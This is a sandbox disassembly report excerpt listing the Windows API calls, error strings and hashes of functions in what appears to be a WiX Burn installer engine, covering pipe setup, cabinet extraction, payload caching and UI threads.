                                                                                                                                                                    • String ID: @$pathutil.cpp
                                                                                                                                                                    • API String ID: 1547313835-3022285739
                                                                                                                                                                    • Opcode ID: 6504b8c57ff73c363e3b3d810fcce27940ad8ffaf82a5d4de0d90d4b04c86d42
                                                                                                                                                                    • Instruction ID: 147be58f1d989992e026756c7da3e759fbf5e3adca18ecbbad5a810aee22f926
                                                                                                                                                                    • Opcode Fuzzy Hash: 6504b8c57ff73c363e3b3d810fcce27940ad8ffaf82a5d4de0d90d4b04c86d42
                                                                                                                                                                    • Instruction Fuzzy Hash: 8B61B337D05229AFDB219AE88C44B9EBBBDAF04750F128165EE10BB190E775DF009BD0
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,74DEDFD0,?,009472C8,?,?), ref: 00946DA6
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00946E11
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00946E89
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00946EC8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Free$Compare
                                                                                                                                                                    • String ID: `<u$label$scheme$term
                                                                                                                                                                    • API String ID: 1324494773-4028212031
                                                                                                                                                                    • Opcode ID: 0b9241f18adf8092da025e38cfd73833bea7a7d5f7de31b6fa4ec86e242960d5
                                                                                                                                                                    • Instruction ID: be6f4b6c40a5336251195ffe9469b366be82614b98d5c67b86e957a3664462dd
                                                                                                                                                                    • Opcode Fuzzy Hash: 0b9241f18adf8092da025e38cfd73833bea7a7d5f7de31b6fa4ec86e242960d5
                                                                                                                                                                    • Instruction Fuzzy Hash: C7515DB9D01219FBCB15DBA4CC45FAEBBB8EF06711F2442A8E511AB1A0D731DE20DB51
                                                                                                                                                                    APIs
                                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 00914DC0
                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000027), ref: 00914DEF
                                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 00914E3A
                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000027), ref: 00914E66
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFromStringUuid
                                                                                                                                                                    • String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
                                                                                                                                                                    • API String ID: 4041566446-2510341293
                                                                                                                                                                    • Opcode ID: 7830e6ad68dddaa3e3a77f30004052c08930f4cce2df8943b94b2a6973b7f352
                                                                                                                                                                    • Instruction ID: 5b664fbf5b56e5f33a0ab17641b82759bce348925af425891e74e5520b916378
                                                                                                                                                                    • Opcode Fuzzy Hash: 7830e6ad68dddaa3e3a77f30004052c08930f4cce2df8943b94b2a6973b7f352
                                                                                                                                                                    • Instruction Fuzzy Hash: 8C418A76E0431CABCF20DBE5DD05FDEB7FCAB88714F20052AE905AB280D6749985CB90
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,0090548E,?,?), ref: 0091EA9D
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090548E,?,?), ref: 0091EAAA
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0091E7B4,?,00000000,00000000), ref: 0091EB03
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090548E,?,?), ref: 0091EB10
                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,0090548E,?,?), ref: 0091EB4B
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,0090548E,?,?), ref: 0091EB6A
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,0090548E,?,?), ref: 0091EB77
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                                    • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                                                                                                                    • API String ID: 2351989216-3599963359
                                                                                                                                                                    • Opcode ID: 35dc17f4dacabff9c06717cc41863f25eac5b6bc14d52f5990b8d8cc0a6e39fa
                                                                                                                                                                    • Instruction ID: 8f4dca0e5fca1f1f8ab3a6720338a35a92100f96ce9ec95ccb3953e03727adba
                                                                                                                                                                    • Opcode Fuzzy Hash: 35dc17f4dacabff9c06717cc41863f25eac5b6bc14d52f5990b8d8cc0a6e39fa
                                                                                                                                                                    • Instruction Fuzzy Hash: 3131A176E4122DBBDB10DFAA8D85ADEBABCBF04350F110065BD14F7280E2709E4087A0
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,0090548E,?,?), ref: 0091E666
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0090548E,?,?), ref: 0091E673
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0091E3C8,00000000,00000000,00000000), ref: 0091E6D2
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0090548E,?,?), ref: 0091E6DF
                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,0090548E,?,?), ref: 0091E71A
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,0090548E,?,?), ref: 0091E72E
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,0090548E,?,?), ref: 0091E73B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                                    • String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
                                                                                                                                                                    • API String ID: 2351989216-1977201954
                                                                                                                                                                    • Opcode ID: b985fbac27aae72503bc80633d66ec1641f9c61f707eb2541c3ce97bf448aaff
                                                                                                                                                                    • Instruction ID: d834efdf848330f5dd37ef5db20339d3e5d89ceaae3ae767f06e7587d7fe0909
                                                                                                                                                                    • Opcode Fuzzy Hash: b985fbac27aae72503bc80633d66ec1641f9c61f707eb2541c3ce97bf448aaff
                                                                                                                                                                    • Instruction Fuzzy Hash: 87318676E0022DBBDB118B99CC05DDFBBB8AB95751F114156FD10F7280E7709A408B90
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,74DF2F60,?,?,00905405,009053BD,00000000,00905445), ref: 00921506
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00921519
                                                                                                                                                                    • GetExitCodeThread.KERNEL32(0094B488,?), ref: 0092155B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00921569
                                                                                                                                                                    • ResetEvent.KERNEL32(0094B460), ref: 009215A4
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009215AE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                                                                    • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                                                                                                                    • API String ID: 2979751695-3400260300
                                                                                                                                                                    • Opcode ID: f92e671680bdfda55fde98dd8530dc39578cb13259d4a670b29fc1d9b2b3cc9e
                                                                                                                                                                    • Instruction ID: 74c124984f0dff6f3f14cd34d155c1ccf17c7b4f0877907b4a33b4438639cbc7
                                                                                                                                                                    • Opcode Fuzzy Hash: f92e671680bdfda55fde98dd8530dc39578cb13259d4a670b29fc1d9b2b3cc9e
                                                                                                                                                                    • Instruction Fuzzy Hash: E231C574A00315EBD710DF6AAD05FAF7BFCEF94711B10819AF906D61A0E770CA10AB55
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetEvent.KERNEL32(0094B478,?,00000000,?,0090C1D3,?,009053BD,00000000,?,0091784D,?,0090566D,00905479,00905479,00000000,?), ref: 0092161B
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090C1D3,?,009053BD,00000000,?,0091784D,?,0090566D,00905479,00905479,00000000,?,00905489,FFF9E89D,00905489), ref: 00921625
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(0094B488,000000FF,?,0090C1D3,?,009053BD,00000000,?,0091784D,?,0090566D,00905479,00905479,00000000,?,00905489), ref: 0092165F
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090C1D3,?,009053BD,00000000,?,0091784D,?,0090566D,00905479,00905479,00000000,?,00905489,FFF9E89D,00905489), ref: 00921669
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00905489,?,00000000,?,0090C1D3,?,009053BD,00000000,?,0091784D,?,0090566D,00905479,00905479,00000000), ref: 009216B4
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00905489,?,00000000,?,0090C1D3,?,009053BD,00000000,?,0091784D,?,0090566D,00905479,00905479,00000000), ref: 009216C3
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00905489,?,00000000,?,0090C1D3,?,009053BD,00000000,?,0091784D,?,0090566D,00905479,00905479,00000000), ref: 009216D2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$ErrorLast$EventObjectSingleWait
                                                                                                                                                                    • String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
                                                                                                                                                                    • API String ID: 1206859064-226982402
                                                                                                                                                                    • Opcode ID: f7c61b9bad55270ba77863a0ee3803c6fb7cf09058b9f00594336d848a3bc719
                                                                                                                                                                    • Instruction ID: 652fba4b070691f1305878858e124803484c5b6208cf64b6706e69ebbf169636
                                                                                                                                                                    • Opcode Fuzzy Hash: f7c61b9bad55270ba77863a0ee3803c6fb7cf09058b9f00594336d848a3bc719
                                                                                                                                                                    • Instruction Fuzzy Hash: 3F212732500A32BBC7215B66EC09B5ABAA8BF14726F190325ED0461DA0D775EC70DBD9
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00940523: EnterCriticalSection.KERNEL32(0096B5FC,00000000,?,?,?,00914207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009054FA,?), ref: 00940533
                                                                                                                                                                      • Part of subcall function 00940523: LeaveCriticalSection.KERNEL32(0096B5FC,?,?,0096B5F4,?,00914207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009054FA,?), ref: 0094067A
                                                                                                                                                                    • OpenEventLogW.ADVAPI32(00000000,Application), ref: 00914212
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0091421E
                                                                                                                                                                    • ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,009539D4,00000000), ref: 0091426B
                                                                                                                                                                    • CloseEventLog.ADVAPI32(00000000), ref: 00914272
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
                                                                                                                                                                    • String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
                                                                                                                                                                    • API String ID: 1844635321-1389066741
                                                                                                                                                                    • Opcode ID: c4042ace58dc65f8990a9cbb7243d92fbbc516f8ce5db08dbc27cb6f3e191ada
                                                                                                                                                                    • Instruction ID: 24e173a8d620f52dc30d43279cd596078eda7703a0124556e13fbaf1f74327ab
                                                                                                                                                                    • Opcode Fuzzy Hash: c4042ace58dc65f8990a9cbb7243d92fbbc516f8ce5db08dbc27cb6f3e191ada
                                                                                                                                                                    • Instruction Fuzzy Hash: ACF0D136B812717A573162671C0AEBF1A2CDACAFB73014418FD20E6080DB60CD8586F5
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 0091949E
                                                                                                                                                                    • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 009194C6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                    • String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0091E577
                                                                                                                                                                    • DefWindowProcW.USER32(?,00000082,?,?), ref: 0091E5B5
                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0091E5C2
                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 0091E5D1
                                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0091E5DF
                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0091E5EB
                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0091E5FC
                                                                                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0091E61E
                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0091E626
                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 0091E629
                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 0091E637
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
                                                                                                                                                                    • String ID:
                                                                                                                                                                    Strings
                                                                                                                                                                    • WixBundleLastUsedSource, xrefs: 0091A1A1
                                                                                                                                                                    • WixBundleLayoutDirectory, xrefs: 0091A26C
                                                                                                                                                                    • Failed to copy source path., xrefs: 0091A31A
                                                                                                                                                                    • Failed to combine last source with source., xrefs: 0091A210
                                                                                                                                                                    • Failed to combine layout source with source., xrefs: 0091A2A4
                                                                                                                                                                    • Failed to get current process directory., xrefs: 0091A1F3
                                                                                                                                                                    • WixBundleOriginalSource, xrefs: 0091A1B7
                                                                                                                                                                    • Failed to get bundle layout directory property., xrefs: 0091A287
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$CloseFileFirstlstrlen
                                                                                                                                                                    • String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00902E5F
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00902E69
                                                                                                                                                                    • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00902F09
                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00902F96
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00902FA3
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00902FB7
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0090301F
                                                                                                                                                                    Strings
                                                                                                                                                                    • pathutil.cpp, xrefs: 00902E8D
                                                                                                                                                                    • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00902F66
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                                                                                                                    • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,009053BD,00000000,00905489,00905445,WixBundleUILevel,840F01E8,?,00000001), ref: 0090CC1C
                                                                                                                                                                    Strings
                                                                                                                                                                    • Payload was not found in container: %ls, xrefs: 0090CD29
                                                                                                                                                                    • payload.cpp, xrefs: 0090CD1D
                                                                                                                                                                    • Failed to ensure directory exists, xrefs: 0090CCEE
                                                                                                                                                                    • Failed to extract file., xrefs: 0090CCE7
                                                                                                                                                                    • Failed to find embedded payload: %ls, xrefs: 0090CC48
                                                                                                                                                                    • Failed to get directory portion of local file path, xrefs: 0090CCF5
                                                                                                                                                                    • Failed to get next stream., xrefs: 0090CD03
                                                                                                                                                                    • Failed to concat file paths., xrefs: 0090CCFC
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                    • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 009047BB
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 009047C1
                                                                                                                                                                    • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0090484F
                                                                                                                                                                    Strings
                                                                                                                                                                    • wininet.dll, xrefs: 009047EE
                                                                                                                                                                    • Failed to load UX., xrefs: 00904804
                                                                                                                                                                    • Failed to create engine for UX., xrefs: 009047DB
                                                                                                                                                                    • Failed to start bootstrapper application., xrefs: 0090481D
                                                                                                                                                                    • engine.cpp, xrefs: 0090489B
                                                                                                                                                                    • Unexpected return value from message pump., xrefs: 009048A5
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Message$CurrentPeekThread
                                                                                                                                                                    • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                                                                                                                                    • API String ID: 673430819-2573580774
                                                                                                                                                                    • Opcode ID: 9905d1e9b0dc33bfd6a9ff18c323fe5894c6891436062a72c2996747707bb1f1
                                                                                                                                                                    • Instruction ID: dcd5d7269a5eb0cd4255656b00dff8ced0a631c0f1f40b9333be165660dcaedd
                                                                                                                                                                    • Opcode Fuzzy Hash: 9905d1e9b0dc33bfd6a9ff18c323fe5894c6891436062a72c2996747707bb1f1
                                                                                                                                                                    • Instruction Fuzzy Hash: E341C2B1A00559BFEB109BA4CC85FBAB7ACEF48314F108925FA04E71D0DB35ED0587A0
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,0092B03E,?,00000001,00000000), ref: 00929D0F
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,0092B03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00929D19
                                                                                                                                                                    • CopyFileExW.KERNEL32(00000000,00000000,00929B69,?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00929D67
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,0092B03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00929D96
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLast$AttributesCopy
                                                                                                                                                                    • String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
                                                                                                                                                                    • API String ID: 1969131206-836986073
                                                                                                                                                                    • Opcode ID: bdcc1f9103d13af6fb6c4d796652aed4f4a83aa074d4356692504a6f4cef93da
                                                                                                                                                                    • Instruction ID: 2fdee664eda8730890a845bf199d4084a3a421109e0d6f565976c8d56dc539e5
                                                                                                                                                                    • Opcode Fuzzy Hash: bdcc1f9103d13af6fb6c4d796652aed4f4a83aa074d4356692504a6f4cef93da
                                                                                                                                                                    • Instruction Fuzzy Hash: C5311772A41235BBDB20DA56EC45E6B77ACAF81B21F148158BD09EB289D631CD00D7E0
                                                                                                                                                                    APIs
                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 00919007
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to allocate access for Users group to path: %ls, xrefs: 00918F72
                                                                                                                                                                    • cache.cpp, xrefs: 00918FB0
                                                                                                                                                                    • Failed to allocate access for Everyone group to path: %ls, xrefs: 00918F51
                                                                                                                                                                    • Failed to allocate access for SYSTEM group to path: %ls, xrefs: 00918F30
                                                                                                                                                                    • Failed to secure cache path: %ls, xrefs: 00918FEA
                                                                                                                                                                    • Failed to create ACL to secure cache path: %ls, xrefs: 00918FBB
                                                                                                                                                                    • Failed to allocate access for Administrators group to path: %ls, xrefs: 00918F0F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeLocal
                                                                                                                                                                    • String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
                                                                                                                                                                    • API String ID: 2826327444-4113288589
                                                                                                                                                                    • Opcode ID: 0ec58a57c0e72abcee6aa295454990024cb8550d1215ec87f606ef03a873210d
                                                                                                                                                                    • Instruction ID: f277794a911b674f24fefbb37bfec7ec465c828085b2740369ade2170c339784
                                                                                                                                                                    • Opcode Fuzzy Hash: 0ec58a57c0e72abcee6aa295454990024cb8550d1215ec87f606ef03a873210d
                                                                                                                                                                    • Instruction Fuzzy Hash: A441F532B4432DB7DB2196508C06FEBB66CEB84B11F114064FE04BA281DF719E85ABE0
                                                                                                                                                                    APIs
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,crypt32.dll,00000008,?,00000000,?,00000000,00000000,crypt32.dll,00000000,?,?,?,00000000,?,00000000), ref: 0091495A
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00914967
                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 00914A12
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00914A1C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastRead
                                                                                                                                                                    • String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$crypt32.dll$pipe.cpp
                                                                                                                                                                    • API String ID: 1948546556-773887359
                                                                                                                                                                    • Opcode ID: 54a2bc10260390939a1e35c043d04e8acbf0f19aaf090cb8f1d9529159a8a50e
                                                                                                                                                                    • Instruction ID: 85af0ffaad39f74e549108473683fff9374af92a363e164dd0745c75a0a072b5
                                                                                                                                                                    • Opcode Fuzzy Hash: 54a2bc10260390939a1e35c043d04e8acbf0f19aaf090cb8f1d9529159a8a50e
                                                                                                                                                                    • Instruction Fuzzy Hash: 3031F532F4422DABDB109AA5CC45BEEB76CAF08B25F118125FD54A6180D7749D809BD0
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF,00000000,00000000,00000000,?,74DEDFD0), ref: 00946C88
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,email,000000FF), ref: 00946CA5
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00946CE3
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00946D27
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$CompareFree
                                                                                                                                                                    • String ID: `<u$email$name$uri
                                                                                                                                                                    • API String ID: 3589242889-1197142144
